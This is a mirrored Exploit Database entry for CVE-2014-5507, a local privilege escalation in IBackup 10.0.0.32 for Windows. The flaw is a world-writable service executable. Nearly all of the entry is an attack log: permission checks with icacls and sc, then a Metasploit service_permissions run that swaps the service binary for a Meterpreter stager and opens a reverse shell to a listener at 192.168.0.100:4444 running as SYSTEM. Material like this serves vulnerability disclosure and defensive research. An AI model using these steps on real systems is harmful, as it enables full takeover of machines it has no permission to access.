iBackup 10.0.0.32 – Local Privilege Escalation

• Exploit Database
• 120 阅读

• 作者： Glafkos Charalambous
  日期： 2014-10-22
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/35040/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107

  # Exploit Title: iBackup <= 10.0.0.32 Local Privilege Escalation # Date: 23/01/2014 # Author: Glafkos Charalambous <glafkos.charalambous[at]unithreat.com> # Version: 10.0.0.32 # Vendor: IBackup # Vendor URL: https://www.ibackup.com/ # CVE-2014-5507     Vulnerability Details There are weak permissions for IBackupWindows default installation where everyone is allowed to change the ib_service.exe with an executable of their choice. When the service restarts or the system reboots the attacker payload will execute on the system with SYSTEM privileges.     C:\Users\0x414141>icacls "C:\Program Files\IBackupWindows\ib_service.exe" C:\Program Files\IBackupWindows\ib_service.exe Everyone:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX)   Successfully processed 1 files; Failed processing 0 files     C:\Users\0x414141>sc qc IBService [SC] QueryServiceConfig SUCCESS   SERVICE_NAME: IBService TYPE : 10WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL: 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\IBackupWindows\ib_service.exe" LOAD_ORDER_GROUP : TAG: 0 DISPLAY_NAME : IBackup Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem       msf exploit(service_permissions) > sessions   Active sessions ===============   IdType InformationConnection ------ --------------------- 1 meterpreter x86/win320x414141-PC\0x414141 @ 0x414141-PC192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)       msf exploit(service_permissions) > show options   Module options (exploit/windows/local/service_permissions):   NameCurrent SettingRequiredDescription -------------------------------------- AGGRESSIVEtrue noExploit as many services as possible (dangerous) SESSION 1yes The session to run this module on.     Payload options (windows/meterpreter/reverse_tcp):   NameCurrent SettingRequiredDescription -------------------------------------- EXITFUNCthread yes Exit technique (accepted: seh, thread, process, none) LHOST 192.168.0.100yes The listen address LPORT 4444 yes The listen port     Exploit target:   IdName ------ 0 Automatic     msf exploit(service_permissions) > exploit   [*] Started reverse handler on 192.168.0.100:4444 [*] Meterpreter stager executable 15872 bytes long being uploaded.. [*] Trying to add a new service... [*] No privs to create a service... [*] Trying to find weak permissions in existing services.. [*] IBService has weak file permissions - C:\Program Files\IBackupWindows\ib_service.exe moved to C:\Program Files\IBackupWindows\ib_service.exe.bak and replaced. [*] Restarting IBService [*] Could not restart IBService. Wait for a reboot. (or force one yourself)   Upon Reboot or Service Restart   [*] Sending stage (770048 bytes) to 192.168.0.102 [*] Meterpreter session 2 opened (192.168.0.100:4444 -> 192.168.0.102:14852) at 2014-07-21 00:52:36 +0300 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > background [*] Backgrounding session 2...   msf exploit(service_permissions) > sessions -l   Active sessions ===============   IdType Information Connection ------ ----------- ---------- 1 meterpreter x86/win320x414141-PC\0x414141 @ 0x414141-PC192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102) 2 meterpreter x86/win32NT AUTHORITY\SYSTEM @ 0x414141-PC192.168.0.100:4444 -> 192.168.0.102:14852 (192.168.0.102)